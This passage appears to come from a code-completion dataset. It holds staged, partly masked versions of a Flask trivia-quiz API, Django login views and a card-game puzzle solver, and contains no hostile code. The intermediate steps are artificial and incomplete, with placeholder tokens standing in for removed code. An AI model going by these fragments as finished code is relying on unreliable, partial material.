{}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}\n ), 400\n\n\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({'success': False, 'error': 404, 'message':\n 'Resource Not Found'}), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-4": "<mask token>\napp.config.from_object('config')\ndb.init_app(app)\n<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n@app.route('/category/<int:category_id>/questions', methods=['GET'])\ndef get_questions_by_category(category_id):\n error = False\n if request.method == 'GET':\n if type(category_id) is not int:\n abort(422)\n try:\n query = Question.query.filter_by(category=str(category_id)).all()\n questions = []\n for question in query:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}\n ), 400\n\n\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({'success': False, 'error': 404, 'message':\n 'Resource Not Found'}), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "import os\nimport sys\nfrom flask import Flask, request, abort, flash, jsonify, Response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom flask_migrate import Migrate\nimport random\nimport unittest\n\nfrom models import db, Question, Category\n\n# set the number of pages fpr pagination\nQUESTIONS_PER_PAGE = 10\n\n# create and configure the app\napp = Flask(__name__)\napp.config.from_object('config')\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\n# set up cors for the application\ncors = CORS(app, resources={r'/': {'origins': '*'}})\n\n# to set Access-Control-Allow Headers and Methods\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n# endpoint to handle GET requests for all available categories\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n# endpoint to handle GET requests for questions with pagination\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n # if question id is not an integer\n if type(page) is not int:\n # let them know their input is not processable\n abort(422)\n # ensure proper request method\n if request.method == 'GET':\n try:\n # query for all categories\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n # let the user know that no resource was found\n abort(404)\n\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n # let the user know that no resource was found\n abort(404)\n if len(query.items) == 0:\n # let the user know that no resource was found\n error = True\n\n results = query.items\n # format data\n for question in results:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n\n if error:\n # let the user know their request was not successful\n abort(400)\n else:\n # if successful send back success response\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': total_questions,\n 'categories': categories\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to delete a question from the database\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n\n # ensure proper request method\n if request.method == 'DELETE':\n\n # if question id is not an integer\n if type(question_id) is not int:\n # let them know their input is not processable\n abort(422)\n\n try:\n # get user selected question from database\n question = Question.query.get(question_id)\n # stage question delete\n db.session.delete(question)\n # commit deletion to the database\n db.session.commit()\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n # close database session\n db.session.close()\n\n if error:\n # send bad request error\n abort(400)\n\n else:\n # if no error send success object and log on server\n return jsonify({\n 'success': True,\n 'method': 'Delete',\n 'question': question_id\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to add a question to the database\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n try:\n # format data for database\n new_question = Question(\n question=request.json['question'],\n answer=request.json['answer'],\n category=request.json['category'],\n difficulty=request.json['difficulty']\n )\n # stage data in database\n db.session.add(new_question)\n # commit data to database\n db.session.commit()\n\n except Exception:\n # set error to true and log on the server\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n # close database session\n db.session.close()\n\n if error:\n # send bad request error\n abort(400)\n else:\n # if no error send success object and log on server\n print('Added: {}'.format(new_question))\n return jsonify({\n 'success': True,\n 'question': request.json\n\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to search for for questions in the database\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n\n # set esrch term from user request\n search_term = str(request.json['searchTerm'])\n # if the user submits something other than a string of text block it\n if type(search_term) is not str:\n # let them know their input is not processable\n abort(422)\n\n try:\n # query database using user provided search term\n query_results = Question.query.filter(\n Question.question.ilike('%{}%'.format(search_term))).all()\n questions = []\n # get categories from database\n categories = [category.type for category in Category.query.all()]\n # format response data\n for question in query_results:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n if error:\n # send bad request error\n abort(400)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': len(questions),\n 'current_category': ''\n })\n else:\n # send method not allowed error\n abort(405)\n\n# endpoint to get questions by a specific category\n@app.route('/category/<int:category_id>/questions', methods=['GET'])\ndef get_questions_by_category(category_id):\n error = False\n\n # ensure proper request method\n if request.method == 'GET':\n\n # if category id is not an integer\n if type(category_id) is not int:\n # let them know their input is not processable\n abort(422)\n\n try:\n # get questions by user selected category\n query = Question.query.filter_by(category=str(category_id)).all()\n questions = []\n # format response data\n for question in query:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n if error:\n # send bad request error\n abort(400)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': len(questions),\n 'current_category': ''\n })\n else:\n # send method not allowed error\n abort(405)\n\n# endpoint to initiate quiz\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n\n try:\n data = request.json\n # get questions from any category\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n # get questions from user specified caetgory\n else:\n query = Question.query.filter_by(\n category=str(int(data['quiz_category']['id'])+1)).all()\n # randomly select new non previously selected question\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query)-1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n # reassign index if already used\n index = random.randint(0, len(query)-1)\n potential_question = query[index]\n else:\n selected = True\n # set question\n _question_ = potential_question\n # format data\n next_question = {\n 'id': _question_.id,\n 'question': _question_.question,\n 'answer': _question_.answer,\n 'category': _question_.category,\n 'difficulty': _question_.difficulty\n }\n except Exception:\n # set error and log error on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n\n if error:\n # send internal server error\n abort(500)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'question': next_question\n })\n else:\n # send method not allowed error\n abort(405)\n\n# handle bad request errors\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"Bad Request\"\n }), 400\n\n# handle resource not found errors\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Resource Not Found\"\n }), 404\n\n# handle resource not found errors\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({\n \"success\": False,\n \"error\": 405,\n \"message\": \"Method Not Allowed\"\n }), 405\n\n# handle unprocessable entity errors\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"Unprocessable Entity\"\n }), 422\n\n# handle internal server errors\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \"Internal Server Error\"\n }), 500\n\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n",
"step-ids": [
8,
10,
12,
14,
17
]
}
|
[
8,
10,
12,
14,
17
] |
<|reserved_special_token_0|>
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def post(self, request):
user = authenticate(username=request.POST['username'], password=
request.POST['password'])
if user is not None:
if user.is_active:
try:
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'
] = user.first_name + ' ' + user.last_name or ''
except:
messages.add_message(request, messages.INFO,
'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else:
messages.add_message(request, messages.INFO,
'user belum terverifikasi')
else:
messages.add_message(request, messages.INFO,
'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
def get(self, request):
return render(request, self.template_name)
def post(self, request):
user = authenticate(username=request.POST['username'], password=
request.POST['password'])
if user is not None:
if user.is_active:
try:
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'
] = user.first_name + ' ' + user.last_name or ''
except:
messages.add_message(request, messages.INFO,
'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else:
messages.add_message(request, messages.INFO,
'user belum terverifikasi')
else:
messages.add_message(request, messages.INFO,
'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, logout, login
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.views import View
class login_view(View):
template_name = 'adminbiobses/login.html'
def get(self, request):
return render(request, self.template_name)
def post(self, request):
user =authenticate(username=request.POST['username'],password=request.POST['password'])
if user is not None :
if user.is_active :
try :
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'] = user.first_name+' '+user.last_name or ''
except :
messages.add_message(request, messages.INFO, 'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else :
messages.add_message(request, messages.INFO, 'user belum terverifikasi')
else :
messages.add_message(request, messages.INFO, 'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
|
flexible
|
{
"blob_id": "e4e2e8ca65d109805b267f148e8d255d81d4ee83",
"index": 1801,
"step-1": "<mask token>\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-2": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-3": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n <mask token>\n\n def post(self, request):\n user = authenticate(username=request.POST['username'], password=\n request.POST['password'])\n if user is not None:\n if user.is_active:\n try:\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'\n ] = user.first_name + ' ' + user.last_name or ''\n except:\n messages.add_message(request, messages.INFO,\n 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else:\n messages.add_message(request, messages.INFO,\n 'user belum terverifikasi')\n else:\n messages.add_message(request, messages.INFO,\n 'user atau password anda salah')\n return render(request, self.template_name)\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-4": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n user = authenticate(username=request.POST['username'], password=\n request.POST['password'])\n if user is not None:\n if user.is_active:\n try:\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'\n ] = user.first_name + ' ' + user.last_name or ''\n except:\n messages.add_message(request, messages.INFO,\n 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else:\n messages.add_message(request, messages.INFO,\n 'user belum terverifikasi')\n else:\n messages.add_message(request, messages.INFO,\n 'user atau password anda salah')\n return render(request, self.template_name)\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, logout, login\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\nclass login_view(View):\n template_name = 'adminbiobses/login.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n user =authenticate(username=request.POST['username'],password=request.POST['password'])\n if user is not None :\n if user.is_active :\n try :\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'] = user.first_name+' '+user.last_name or ''\n except :\n messages.add_message(request, messages.INFO, 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else :\n messages.add_message(request, messages.INFO, 'user belum terverifikasi')\n else :\n messages.add_message(request, messages.INFO, 'user atau password anda salah')\n \n return render(request, self.template_name)\n\nclass logout_view(View):\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n def get(self, request):\n return render(request, self.template_name)\n ",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
def parse(filename):
t1, t2 = open(filename).read().strip().split("\n\n")
return tuple(map(lambda x: list(map(int, x.split("\n")[1:])), [t1, t2]))
def score(deck):
res = 0
for i in range(len(deck)):
res += deck[i] * (len(deck)-i)
return res
def solution1(deck1, deck2):
while len(deck1) > 0 and len(deck2) > 0:
p1, p2 = deck1[0], deck2[0]
if p1 > p2:
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return score(deck1)
return score(deck2)
def can_recurse(deck1, deck2):
p1, p2 = deck1[0], deck2[0]
return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1
def combat(deck1, deck2):
db = set()
while len(deck1) > 0 and len(deck2) > 0:
key = (tuple(deck1), tuple(deck2))
if key in db:
return "p1", score(deck1)
db.add(key)
p1, p2 = deck1[0], deck2[0]
if can_recurse(deck1, deck2):
winner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])
else:
winner = "p1" if p1 > p2 else "p2"
if winner == "p1":
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return "p1", score(deck1)
return "p2", score(deck2)
def solution2(deck1, deck2):
return combat(deck1, deck2)[1]
def main():
print(solution1(*parse("sample.txt")))
print(solution1(*parse("input.txt")))
print(solution2(*parse("sample.txt")))
print(solution2(*parse("input.txt")))
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "508d016161131481ace41f3d3bda005423125fe5",
"index": 5635,
"step-1": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\n<mask token>\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
"step-2": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
